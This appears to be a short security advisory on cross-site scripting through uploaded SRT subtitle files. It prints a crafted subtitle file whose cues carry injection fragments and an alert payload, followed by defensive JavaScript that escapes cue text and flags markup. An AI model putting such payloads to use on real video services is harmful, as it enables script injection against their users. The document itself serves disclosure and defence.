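An attacker may be able to execute JavaScript through a video's subtitles. This is a form of XSS (Cross-Site Scripting). If a website loads subtitles separately in the browser, an attacker can run arbitrary HTML or JavaScript in the video subtitles. This has been tested on some video services.
The attacker can save the content shown below in SRT format and upload the prepared SRT file as the video's subtitles: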
1
00:00:37,618 --> 00:00:42,557
: '';!--'
2
00:00:58,425 --> 00:01:00,704
3
00:01:00,705 --> 00:01:01,873
4
00:01:02,225 --> 00:01:04,519
5
00:01:04,520 --> 00:01:05,547
6
00:01:05,864 --> 00:01:08,117
7
00:01:08,224 --> 00:01:09,223
'>
8
00:01:09,224 --> 00:01:10,434
9
00:01:11,384 --> 00:01:12,427
10
00:01:15,504 --> 00:01:17,506
11
00:01:19,743 --> 00:01:20,786
12
00:01:24,183 --> 00:01:25,351
13
00:01:40,663 --> 00:01:41,705
14
00:01:42,703 --> 00:01:45,742
15
00:01:45,743 --> 00:01:46,285
16
00:01:48,503 --> 00:01:49,545
17
00:01:49,582 --> 00:01:51,709
18
00:01:54,822 --> 00:01:58,200
19
00:02:01,021 --> 00:02:03,691
20
00:02:04,702 --> 00:02:05,744
21
00:02:15,700 --> 00:02:18,536
22
00:02:18,740 --> 00:02:22,619
';alert('XSS');//
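
On the defending side, a player that loads subtitles in the browser has to treat every cue's text as untrusted data. The following is an added example, not code from the original page: it parses SRT, escapes cue text before it is placed into HTML, and flags cues containing markup at upload time. The function names, the `cue` class and the sample input are assumptions made for illustration.

```javascript
// Added example: treat SRT cue text as untrusted data before it reaches the DOM.
// Constructed sample input; cue 2 carries markup, cue 3 a script-context string.
const SAMPLE_SRT = [
  "1", "00:00:37,618 --> 00:00:42,557", "Hello, world", "",
  "2", "00:00:58,425 --> 00:01:00,704", "<script>alert('XSS')</script>", "",
  "3", "00:02:18,740 --> 00:02:22,619", "';alert('XSS');//", "second line", ""
].join("\r\n");

const TIMING = /^(\d{2}:\d{2}:\d{2},\d{3}) --> (\d{2}:\d{2}:\d{2},\d{3})/;

// Parse SRT into cues; blocks without a valid timing line are dropped.
function parseSrt(srt) {
  const cues = [];
  for (const block of srt.replace(/\r\n?/g, "\n").split(/\n{2,}/)) {
    const lines = block.split("\n").filter((l) => l.length > 0);
    const at = lines.findIndex((l) => TIMING.test(l));
    if (at === -1) continue;
    const [, start, end] = lines[at].match(TIMING);
    cues.push({ start, end, text: lines.slice(at + 1).join("\n") });
  }
  return cues;
}

// Escape every character that is significant in HTML text and attribute contexts.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Build the markup for one cue: escaped text only, line breaks added by us.
function renderCue(cue) {
  return '<span class="cue">' + escapeHtml(cue.text).split("\n").join("<br>") + "</span>";
}

// Upload-time check: return the start times of cues whose text contains markup.
function findSuspiciousCues(srt) {
  return parseSrt(srt).filter((c) => /[<>]/.test(c.text)).map((c) => c.start);
}
```

HTML escaping covers cue text placed into markup; it does not make the text safe inside an inline script, which is the context the last cue above targets. There, assign the text through `textContent` or pass it as serialized JSON instead of concatenating it into code.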